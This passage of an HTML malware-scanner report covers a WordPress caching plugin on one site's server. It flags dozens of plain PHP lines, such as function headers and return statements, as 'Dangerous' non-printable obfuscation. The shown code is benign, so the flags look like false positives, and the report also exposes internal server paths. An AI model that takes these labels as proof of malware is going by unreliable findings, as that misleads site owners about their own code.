</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 538</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$resBackup</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 544</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_image</span><span style="color: #007700">(</span><span style="color: #0000BB">$source_path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 548</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 554</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_webp</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 571</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$response</span><span style="color: #007700">-></span><span style="color: #0000BB">get_error_message</span><span style="color: #007700">());</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 584</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">compress_image_external</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">')){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">-></span><span style="color: #0000BB">content_urls_replacement</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$wph</span><span style="color: #007700">-></span><span style="color: #0000BB">functions</span><span style="color: #007700">-></span><span style="color: #0000BB">get_replacement_list</span><span style="color: #007700">());</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #DD0000">"url" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$server_output</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$res</span><span style="color: #007700">-></span><span style="color: #0000BB">error_message</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"Error Code 103"</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 623</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns </span><span style="color: #007700">for </span><span style="color: #0000BB">the sub images</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 625</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"500"</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"Internal Server Error: "</span><span style="color: #007700">.</span><span style="color: #0000BB">$url</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"Could not connect server"</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getQuality</span><span style="color: #007700">(</span><span style="color: #0000BB">$img</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 638</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">85</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_count_only</span><span style="color: #007700">(</span><span style="color: #0000BB">$query_images_args</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 641</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">90</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 644</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">compareSizes</span><span style="color: #007700">(</span><span style="color: #0000BB">$source_path</span><span style="color: #007700">, </span><span style="color: #0000BB">$destination_path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$diff </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$diff </span><span style="color: #007700">: </span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 650</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBackupFolder</span><span style="color: #007700">(</span><span style="color: #0000BB">$destination_path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 668</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$parentPath</span><span style="color: #007700">.</span><span style="color: #DD0000">" is not writable"</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">2</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_total_image_error_number</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 673</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #DD0000">""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_server_location</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 684</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setId</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 692</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setImages</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_correct_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">HTTP but it </span><span style="color: #007700">return /</span><span style="color: #0000BB">wp</span><span style="color: #007700">-</span><span style="color: #0000BB">content so we need to check</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 746</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">images_not_in_metadata</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setPath</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 793</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setUrl</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 797</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setName</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 815</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMetaData</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 820</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getFirstId</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 831</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">ID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$query_image</span><span style="color: #007700">-></span><span style="color: #0000BB">posts</span><span style="color: #007700">) == </span><span style="color: #0000BB">1 </span><span style="color: #007700">? </span><span style="color: #0000BB">$query_image</span><span style="color: #007700">-></span><span style="color: #0000BB">posts</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]-></span><span style="color: #0000BB">ID </span><span style="color: #007700">: </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 873</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_update_image_list_ajax_request</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">null_posts_groupby</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">""</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">count_posts_fields</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 924</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_credit</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">0</span><span style="color: #007700">; </span><span style="color: #FF8000">//bugs</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 92</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"COUNT(*) as post_count_wpfc"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 933</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">-></span><span style="color: #0000BB">get_error_message</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Error Occured"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 948</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$credit</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_statics_ajax_request</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_count_only</span><span style="color: #007700">(</span><span style="color: #0000BB">$query_images_args</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 988</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_optimize_image_ajax_request</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_518").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/update.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.60 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_519" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$transient</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_fastest_cache_premium_plugin_info</span><span style="color: #007700">( </span><span style="color: #0000BB">$res</span><span style="color: #007700">, </span><span style="color: #0000BB">$action</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">){</span>
</span>
